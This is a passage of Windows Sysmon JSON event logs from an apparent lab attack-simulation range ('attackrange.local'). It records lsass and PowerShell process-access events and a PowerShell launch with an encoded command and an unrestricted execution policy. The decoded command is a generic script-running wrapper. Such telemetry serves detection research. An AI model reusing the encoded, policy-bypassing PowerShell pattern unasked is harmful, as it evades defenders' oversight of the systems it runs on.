C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.762","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.762\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.762","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.828\r\nProcessGuid: {A837DB8D-0527-5F25-0000-0010C8D31300}\r\nProcessId: 2744\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0527-5F25-0000-002012C41300}\r\nLogonId: 0x13C412\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nParentProcessId: 4892\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.828","ProcessGuid":"{A837DB8D-0527-5F25-0000-0010C8D31300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0527-5F25-0000-002012C41300}","LogonId":"0x13c412","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0527-5F25-0000-0010D1C71300}","ParentProcessId":"4892","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.825\r\nSourceProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nSourceProcessId: 4892\r\nSourceThreadId: 1320\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010C8D31300}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+95892f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+957e50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94cf485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d52d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d36223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d281a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d346db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d342ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d33cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+957e50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d1ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+94d1a0f9(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.825","SourceProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","SourceProcessId":"4892","SourceThreadId":"1320","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010C8D31300}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\